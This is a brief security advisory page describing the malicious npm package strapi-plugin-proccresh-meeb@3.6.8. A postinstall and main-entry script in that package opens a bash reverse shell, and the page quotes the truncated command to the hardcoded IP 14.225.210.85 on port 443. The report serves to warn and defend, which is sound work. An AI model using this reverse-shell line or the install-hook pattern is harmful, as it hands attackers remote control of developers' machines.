OpenSSF/OSV advisory MAL-2026-16182 confirms this npm version as malicious. strapi-plugin-proccresh-meeb ships a postinstall dropper that opens a bash reverse shell to the hardcoded IP 14.225.210.85 on TCP/443 at npm install time. package.json declares `"scripts": { "postinstall": "node postinstall.js" }` and `"main": "postinstall.js"`, so both `npm install` and any `require()` of the package unconditionally execute `postinstall.js`, which runs `bash -c 'bash -i > /dev/tcp/14.225.210.85/443...
This report applies to strapi-plugin-proccresh-meeb@3.6.8.
See version security history for other recorded verdicts.
Evidence last updated: .
Source advisory published: .
This report uses published external intelligence. The advisory does not provide a separate source-code analysis for each listed version.